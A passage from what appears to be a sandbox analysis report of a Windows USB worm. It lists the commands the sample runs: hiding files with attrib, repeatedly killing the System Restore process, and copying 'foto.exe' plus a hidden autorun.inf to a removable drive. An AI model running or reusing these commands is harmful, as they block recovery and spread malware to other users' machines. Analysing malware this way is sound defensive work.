    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg"
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg"
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg"
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg"
    3⤵
    - Views/modifies file attributes
    PID:2740
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg"
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg"
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg"
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg"
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg"
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg"
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg"
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg"
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Local\Temp\Admin.bmp"
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Roaming\WatchNew.system"
    3⤵
    - Views/modifies file attributes
    PID:2176
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg"
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2188
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2276
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2872
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2972
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1244
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:296
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1152
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:540
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:300
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1828
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1080
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1396
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1000
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1352
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:640
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:620
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2552
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2820
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2816
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2664
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2260
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:488
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2408
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2024
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:908
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:448
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:612
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2300
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:712
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2512
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:348
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:892
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:316
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
